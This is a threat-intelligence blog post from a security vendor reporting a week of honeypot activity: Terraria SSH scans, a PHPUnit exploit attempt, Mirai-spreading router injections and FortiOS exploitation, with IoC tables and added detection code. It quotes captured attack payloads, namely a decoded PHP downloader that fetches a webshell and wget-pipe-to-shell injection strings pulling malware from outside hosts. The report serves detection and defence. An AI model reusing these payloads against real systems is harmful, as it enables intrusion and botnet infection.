URL: https://tehtris.com/en/blog/honeypots-activity-of-the-week-43/

November 4, 2022

CERT, Honeypots


HONEYPOTS: ACTIVITY OF THE WEEK 43


During week 43, TEHTRIS chose to highlight 4 malicious activities observed on
its international honeypot network.

 * SSH scan: targeting terraria game servers
 * Focus on IP 51.77.247[.]119
 * Exploitation of router vulnerabilities to propagate the Mirai botnet
   * User agent “Momentum”
   * User agent “r00ts3c-owned-you”
 * Attempts to exploit a Fortinet vulnerability


SSH SCAN: TARGETING TERRARIA GAME SERVERS

This week, 10 IP addresses attempted to use the login “terraria” (and variants)
more than 560 times on the TEHTRIS honeypot network.

IP source         | Count (%) | AS                                          | Country
------------------|-----------|---------------------------------------------|--------
194.163.148[.]7   | 27.629%   | AS 51167 (Contabo GmbH)                     | DE
139.99.9[.]147    | 21.925%   | AS 16276 (OVH SAS)                          | SG
15.235.114[.]79   | 13.904%   | AS 16276 (OVH SAS)                          | CA
167.86.69[.]67    | 8.378%    | AS 51167 (Contabo GmbH)                     | DE
173.212.196[.]6   | 7.487%    | AS 51167 (Contabo GmbH)                     | DE
135.125.194[.]20  | 4.635%    | AS 16276 (OVH SAS)                          | DE
194.163.149[.]141 | 4.635%    | AS 51167 (Contabo GmbH)                     | DE
51.222.12[.]137   | 4.635%    | AS 16276 (OVH SAS)                          | CA
194.233.80[.]38   | 4.456%    | AS 141995 (Contabo Asia Private Limited)    | SG
137.74.0[.]223    | 2.317%    | AS 16276 (OVH SAS)                          | PL

These 10 IP addresses tested the same 27 login / password combinations.

It is likely that these SSH scans are aimed at detecting and compromising
Terraria game servers. TEHTRIS strongly recommends that you always change your
default credentials to avoid exposing your servers to automatic scans.
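As an added example (not TEHTRIS code), the following Python groups honeypot login attempts by source, flags "terraria"-style usernames, and clusters sources that tried an identical credential list, which is how the shared 27-combination pattern described above would surface in triage. The JSON-lines event layout and the events themselves are constructed assumptions.

```python
import json
import re
from collections import defaultdict

# Constructed honeypot login events in an assumed JSON-lines layout
# (src_ip, username, password); not TEHTRIS data, IPs from documentation ranges.
SAMPLE_EVENTS = """
{"src_ip": "203.0.113.10", "username": "terraria", "password": "terraria"}
{"src_ip": "203.0.113.10", "username": "terraria", "password": "terraria123"}
{"src_ip": "203.0.113.10", "username": "terrariaserver", "password": "password"}
{"src_ip": "203.0.113.11", "username": "terraria", "password": "terraria"}
{"src_ip": "203.0.113.11", "username": "terraria", "password": "terraria123"}
{"src_ip": "203.0.113.11", "username": "terrariaserver", "password": "password"}
{"src_ip": "198.51.100.7", "username": "root", "password": "123456"}
"""

TERRARIA_RE = re.compile(r"terraria", re.IGNORECASE)


def parse_events(text):
    """Parse JSON-lines login events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def credential_sets(events):
    """Map each source IP to the set of (username, password) pairs it tried."""
    per_ip = defaultdict(set)
    for ev in events:
        per_ip[ev["src_ip"]].add((ev["username"], ev["password"]))
    return {ip: frozenset(creds) for ip, creds in per_ip.items()}


def terraria_sources(events, min_attempts=2):
    """Source IPs that used a 'terraria'-style login at least min_attempts times."""
    counts = defaultdict(int)
    for ev in events:
        if TERRARIA_RE.search(ev["username"]):
            counts[ev["src_ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= min_attempts}


def shared_credential_clusters(cred_sets):
    """Group IPs that tested exactly the same credential list (a campaign fingerprint)."""
    clusters = defaultdict(list)
    for ip, creds in cred_sets.items():
        clusters[creds].append(ip)
    return sorted(sorted(ips) for ips in clusters.values() if len(ips) > 1)
```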


FOCUS ON IP 51.77.247[.]119

The French IP address 51.77.247[.]119, from AS 16276 (OVH SAS), sent a web
request on 30/10/22 to Lithuanian infrastructure, including:

 * The URL /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php, which makes it
   possible to exploit the CVE-2017-9841 (CVSS3: 9.8) vulnerability in PHPUnit,
   which allows an attacker to remotely execute code on a vulnerable site
 * The following query encoded in base 64 in the Raw Data:

<?php eval('?>'.base64_decode('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')); ?>

Decoded from base 64:

<?php
function adminer($url, $isi) {
	$fp = fopen($isi, "w");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_FILE, $fp);
	return curl_exec($ch);
	curl_close($ch);
	fclose($fp);
	ob_flush();
	flush();
}
if(adminer("https[:]//pastebin[.]pl/view/raw/7d387f1e","Bugz.php")) {
	echo "Suksesgblk";
} else {
	echo "fail";
}
?>

The function the attacker seeks to execute, presumably by exploiting
CVE-2017-9841, downloads a file from the URL
https[:]//pastebin[.]pl/view/raw/7d387f1e. This URL is flagged in public
databases, in particular for serving a file (sha256:
753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b) containing an
obfuscated PHP webshell. This webshell is called FoxAutoV5 and is available on
https[:]//anonymousfox[.]co.

FoxAutoV5 (sha256:
753519b661cb2c8960c522a8836ba2c5400372cc7f0afff448b47aab3fbd2d2b)

FoxAutoV5 includes many features for exploring compromised machines and
searching them for information, allowing the attacker to map the environment:
where password data is located, where the vulnerabilities are, and so on. It
also provides bruteforce and lateral movement capabilities. This webshell is not
very secure (there is no password to access it, for instance), but it is encoded
well enough to defeat some static searches and avoid detection. Its score on
VirusTotal is only 2/61.

Moreover, the IP 51.77.247[.]119 that caused this event appeared in malicious
files exploiting the Log4j vulnerability (mentioned in week 42).


EXPLOITATION OF ROUTER VULNERABILITIES TO PROPAGATE THE MIRAI BOTNET


USER AGENT “MOMENTUM”

2 IP addresses were associated with the User Agent “Momentum” and sent the
following URL request:

/GponForm/diag_Form?images/

This URL targets CVE-2018-10561 (CVSS3: 9.8), an authentication bypass
affecting Dasan GPON routers (mentioned in week 39).

If the vulnerability is present, the header names the server that will be
contacted to download a malicious file (possibly a Mirai backdoor). Thus:

 * US IP 193.47.61[.]60 (AS 211252 DELIS LLC) is associated with the header
   'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget
   http[:]//185.132.53[.]105g -O-|sh&ipv=0'
 * Singaporean IP 185.132.53[.]136 (AS 202437 – Julian Achter) is associated
   with the header
   'XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget
   http[:]//45.95.55[.]214/o/g -O-|sh&ipv=0'

German IP 45.95.55[.]214 (AS 200303 – LUMASERV Systems) is known to propagate
Mirai. In addition, the Momentum botnet targeting Linux systems was revealed in
late 2019 and is known to distribute Mirai backdoors and enlist devices to
perform DDoS attacks, among other things.


USER AGENT “R00TS3C-OWNED-YOU”

10 IP addresses scanned for known vulnerabilities in some versions of ZyXEL,
Billion (mentioned in week 39) and D-Link routers to spread the Mirai botnet.

IP source        | AS                                         | Country
-----------------|--------------------------------------------|--------
111.118.40[.]97  | AS 7562 (HCN Dongjak)                      | KR
137.25.54[.]5    | AS 20115 (CHARTER-20115)                   | US
209.93.149[.]48  | AS 6871 (British Telecommunications PLC)   | GB
59.187.205[.]166 | AS 7562 (HCN Dongjak)                      | KR
143.159.103[.]77 | AS 6871 (British Telecommunications PLC)   | GB
172.91.47[.]43   | AS 20001 (TWC-20001-PACWEST)               | US
74.108.124[.]79  | AS 701 (UUNET)                             | US
75.67.32[.]138   | AS 7922 (COMCAST-7922)                     | US
88.105.235[.]114 | AS 9105 (TalkTalk)                         | GB
92.14.135[.]177  | AS 9105 (TalkTalk)                         | GB

In the raw data, two types of commands are observed:

' remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http[:]//134.195.138[.]33/.nCKx/zx.arm7+-O+arm7;chmod+777+arm7;./arm7 selfr'

remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=;cd /tmp;wget http[:]//46.19.141[.]122/zyxel;chmod 777 zyxel;sh zyxel;rm -rf arm7;#&r'

IP 134.195.138[.]33 (US – AS 35913 – DEDIPATH-LLC) and 46.19.141[.]122 (CH – AS
51852 – Private Layer INC) are known to distribute the Mirai botnet. The Swiss
IP was referred to in files SHA256
f4a46b4bc24cc2a0ce33d32ee057f31c1370c52caa3c8813669069a1d7351066 and
40efadebd319686595727d07b7b1e1518a89074098c05a2a746f7846efe1e161.


ATTEMPTS TO EXPLOIT A FORTINET VULNERABILITY

Following a PoC published in October 2022 by Horizon3 for the Fortinet
vulnerability CVE-2022-40684 (CVSS3: 9.8), through which an attacker can log in
as an admin, TEHTRIS observes that this PoC was used by attackers, with the
same URL (/api/v2/cmdb/system/admin/admin), the same User Agent (“Report
Runner”) and the same header (except that the port was changed from 8888 to 9000):

['forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;', 'connection: close', 'content-type: application/json', 'accept-encoding: gzip']

6 IP addresses (4 of which are unknown to public databases) made these
requests, presumably as part of a multi-vulnerability scan that also includes
CVE-2021-26086 (CVSS3: 5.3), affecting Atlassian Jira Server and Data Center.

IoC:

IP source         | AS                          | Country
------------------|-----------------------------|--------
139.59.85[.]24    | AS 14061 (DIGITALOCEAN-ASN) | IN
159.65.199[.]18   | AS 14061 (DIGITALOCEAN-ASN) | NL
167.172.246[.]222 | AS 14061 (DIGITALOCEAN-ASN) | US
172.105.91[.]134  | AS 63949 (Linode, LLC)      | DE
172.105.98[.]145  | AS 63949 (Linode, LLC)      | CA
178.128.43[.]0    | AS 14061 (DIGITALOCEAN-ASN) | GB

As a reminder, attackers use automated systems to scan large portions of the
internet to find vulnerabilities to exploit. Don’t leave the door open!
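The four web request patterns described in the sections above (the PHPUnit eval-stdin.php path, the GPON diag_Form dest_host injection, the router remote_host injection, and the FortiOS admin API request with the spoofed Forwarded header and “Report Runner” User Agent) as detection rules over request records, written here as an added example rather than TEHTRIS or Horizon3 code. The record layout, the sample requests (documentation addresses) and the placeholder router endpoint are assumptions, since the report names no path for the remote_host requests.

```python
import re

# Constructed request records in an assumed dict layout (path, user_agent,
# headers, body) such as a honeypot or reverse proxy might log; they imitate
# the report's patterns with documentation addresses, and the router endpoint
# is a placeholder because the report names no path for it.
SAMPLE_REQUESTS = [
    {"path": "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
     "user_agent": "Mozilla/5.0", "headers": {}, "body": "<?php echo 1; ?>"},
    {"path": "/GponForm/diag_Form?images/", "user_agent": "Momentum", "headers": {},
     "body": "XWebPageName=diag&diag_action=ping&wan_conlist=0"
             "&dest_host=`wget http://192.0.2.1/g -O-|sh`&ipv=0"},
    {"path": "/PLACEHOLDER_ROUTER_ENDPOINT", "user_agent": "r00ts3c-owned-you",
     "headers": {}, "body": "remote_submit_Flag=1&remote_host=%3bcd+/tmp"
                            ";wget+http://192.0.2.2/zyxel;chmod+777+zyxel"},
    {"path": "/api/v2/cmdb/system/admin/admin", "user_agent": "Report Runner",
     "headers": {"Forwarded": "for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;"},
     "body": "{}"},
    {"path": "/index.html", "user_agent": "Mozilla/5.0", "headers": {}, "body": ""},
]

# A shell metacharacter (raw or URL-encoded) followed by a download or exec command.
SHELL_INJECT = re.compile(r"(`|;|%3b|\|)\+?\s*(wget|curl|sh|cd)\b", re.IGNORECASE)


def classify(req):
    """Return the names of the report's patterns that match one request."""
    hits = []
    path, ua, body = req["path"], req.get("user_agent", ""), req.get("body", "")
    headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
    if path.endswith("/Util/PHP/eval-stdin.php"):
        hits.append("CVE-2017-9841 PHPUnit eval-stdin.php")
    if path.startswith("/GponForm/diag_Form") and "dest_host=" in body and SHELL_INJECT.search(body):
        hits.append("CVE-2018-10561 GPON dest_host command injection")
    if "remote_host=" in body and SHELL_INJECT.search(body):
        hits.append("router remote_host command injection")
    if (path.startswith("/api/v2/cmdb/system/admin")
            and "for=[127.0.0.1]" in headers.get("forwarded", "")
            and ua == "Report Runner"):
        hits.append("CVE-2022-40684 FortiOS admin API with spoofed Forwarded header")
    if ua in ("Momentum", "r00ts3c-owned-you"):
        hits.append("user agent seen spreading Mirai")
    return hits


def scan(requests):
    """(path, hits) for every request that triggers at least one pattern."""
    return [(r["path"], hits) for r in requests if (hits := classify(r))]
```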

